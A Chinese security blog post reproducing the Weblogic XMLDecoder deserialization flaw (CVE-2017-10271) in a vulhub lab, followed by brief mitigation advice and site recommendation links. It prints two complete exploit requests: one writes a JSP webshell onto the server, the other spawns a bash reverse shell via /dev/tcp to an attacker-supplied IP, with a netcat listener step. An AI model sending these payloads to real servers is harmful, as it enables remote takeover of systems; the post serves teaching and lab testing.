Weblogic XMLDecoder 反序列化漏洞

最新推荐文章于 2024-04-13 13:34:57 发布
最新推荐文章于 2024-04-13 13:34:57 发布
阅读量218 收藏 3
点赞数 1
分类专栏: 渗透测试篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41438728/article/details/109636893
版权

Weblogic XMLDecoder 反序列化漏洞

(CVE-2017-10271)检测与利用复现

原理

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
漏洞环境搭建
启动vulhub中的CVE-2017-10271
注意:复现过程基于同一台云主机,云主机内部靶场镜像开启CVE-2017-10271,文章内所有IP为同一个,请自行区分攻击方和受害方。在这里插入图片描述

漏洞检测
在这里插入图片描述

漏洞利用
反弹shell,访问http://IP:7001/wls-wsat/CoordinatorPortType
在这里插入图片描述
Burp抓包传入数据验证
(1)尝试写入Webshell。打开漏洞地址,本次实例为:http://IP:7001/wls-wsat/CoordinatorPortType(上边的漏洞地址都可以试一下)。使用Burp抓包,将其转发到“Repeater”模块下,
抓到的包如下
在这里插入图片描述

(2)将GET变为POST,并复制Webshell,粘贴,替换里面的内容,点击Go按钮。
在这里插入图片描述

访问地址:
http://150.158.193.92:7001/bea_wls_internal/test.jsp
测试有结果,存在此漏洞。
webshell内容如下(注意修改GET为POST;Content-Type: application/x-www-form-urlencoded为Content-Type: text/xml):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 150.158.193.92:7001
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml
Content-Length: 646

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println">
<string>
    <![CDATA[
<% out.print("webshell"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

反弹一个shell
(1)使用Burp抓包,将其转发到“Repeater”模块下,攻击机开始监听,nc -l -p 端口
在这里插入图片描述

(2)将GET变为POST,并将反弹shell数据(IP要修改为攻击机的IP)粘贴至此,在开始完监听端口后,点击Go,发送数据
在这里插入图片描述
在这里插入图片描述

(3)反弹成功!
在这里插入图片描述

(4)反弹shell内容如下:(注意修改GET为POST;Content-Type: application/x-www-form-urlencoded为Content-Type: text/xml)


POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 150.158.193.92:7001
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml
Content-Length: 641

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://beas.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/your-IP/5678 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

漏洞防御

(1)临时解决方案 根据业务所有需求,考虑是否删除WLS-WebServices组件。包含此组件路径为:
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
Middleware/wlserver_10.3/server/lib/wls-wsat.war

以上路径都在WebLogic安装处。删除以上文件之后,需重启WebLogic。确认http://weblogic_ip/wls-wsat/ 是否为404页面。
(2)官方补丁修复 前往Oracle官网下载10月份所提供的安全补丁。

德古拉的杂货铺
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic反序列化XMLDecoder
遇事不决冲冲冲
05-18 1962
基于XMLweblogic反序列化漏洞 紧跟上文,这篇来分析一下基于XMLweblogic反序列化漏洞,这里xml本身就是序列化对象,通过XMLDecoder进行反序列化解析(循环遍历XML数据并进行拼接处理),最终拼接出完整的恶意语句并执行,列出CVE:CVE-2017-3506、CVE-2017-10271、CVE-2019-2729、CVE-2019-2725,漏洞复现,断点分析,修复
Weblogic XMLDecoder 反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
05-20 2463
本文介绍了Weblogic XMLDecoder反序列化相关的漏洞原理和poc的构造,并以CVE-2017-10271为例在vulhub上进行了复现。有关Weblogic XMLDecoder反序列化漏洞包括CVE-2017-3506、CVE-2017-10271、CVE-2019-2725、CVE-2019-2729等,其漏洞原理相似,本文对此进行了简要介绍。
weblogic漏洞汇总-XMLDecoder
黑白的博客
06-25 3558
受影响的版本vulhub上面只有CVE-2017-10271,我们就起CVE-2017-10271的镜像吧,因为CVE-2017-3506和CVE-2017-10271调用链都一样先有的CVE-2017-3506,不对用户输入的SOAP (XML) 数据进行验证,在其中使用object标签就可以进行远程命令执行。
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
huangyongkang666的博客
07-25 1262
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
weblogic反序列化
m0_67284865的博客
07-02 409
weblogic的两种反序列化xml和wls
反序列化漏洞原理_Weblogic XMLDecoder 反序列化漏洞
weixin_39997194的博客
12-11 577
这次来研究一下weblogic一些反序列化漏洞.主要是: CVE-2017-3506 ,CVE-2017-10271 CVE-2019-2725这三个CVE,就是一个不停绕过的过程.从CVE-2017-3506开始发现,官方设置黑名单,安全研究者绕过了两次.感觉可能会有第三次. 漏洞测试环境参考:Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
Java反序列化漏洞利用工具.zip
04-10
标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
反序列化漏洞检查工具 Weblogic XML CVE-2017-10271
01-09
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
2018最新weblogic反序列化漏洞补丁包
05-22
在p27395085_1036_Generic补丁的基础上再打上27453773_1036_Gener,解决CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2018-2628
weblogic 反序列化漏洞补丁
07-05
WebLogic是Oracle公司的一...总之,WebLogic反序列化漏洞CVE-2018-2628是一个严重威胁,需要及时通过安装补丁和加强安全管理来消除风险。对于企业而言,了解和掌握这类漏洞及其修复方法是保护信息系统安全的重要一环。
weblogic-XMLDecoder反序列化
qq_43381463的博客
03-09 190
漏洞复现-CVE-2017-10271
WebLogic-XMLDecoder(CVE-2017-10271)反序列化漏洞分析及复现
最新发布
人若无名,便可专心练剑
04-13 1581
下面的内容主要是给师傅们介绍和讲解下weblogic XMLDecoder漏洞,这个漏洞有很多个版本,有多个cve漏洞,这里我主要从基于IDEA和vulhun环境搭建来给师傅们复现下这个weblogic XMLDecoder漏洞。复现完成的师傅们,要是基础还可以,学过Java代码的可以尝试掌握下这个漏洞的POC构造,这个是底层代码原理,比较难,小白的话把漏洞原理以及漏洞复现完成即可!!!
Weblogic反序列化远程代码执行漏洞(CVE-2019-2725)
weixin_41182861的博客
09-25 2223
漏洞简述 2019年4月17日,CNVD 发布《关于Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞的安全公告》,公告指出部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。 漏洞编号:CVE-2019-2725 影响版本:10.3.6.0、
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)
Lucky1youzi的博客
01-02 167
weblogic相关漏洞复现
drozer安全评估框架基础使用技法
weixin_41438728的博客
04-13 8027
drozer安全评估框架基础使用技法 ----桂亚平20220331整理 1 测试前准备 1.1 安卓系统 准备环境:安卓模拟器6.5.0.1版-夜神模拟器 1.2 adb(Android Debug Bridge)工具 adb(Android Debug Bridge),android sdk中的一个工具,分为客户端(电脑)和服务端(android手机或者模拟器),可以用来直接操作管理android模拟器或者真实的android设备。 测试环境adb的路径:D:\Program Files\Nox
weblogic 反序列化漏洞检测工具
09-12
对于WebLogic反序列化漏洞的检测,可以使用以下几种工具: 1. ysoserial:这是一个常用的Java反序列化漏洞利用工具,可以生成不同Payload来测试WebLogic反序列化漏洞。您可以通过Github找到它的相关代码和用法。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值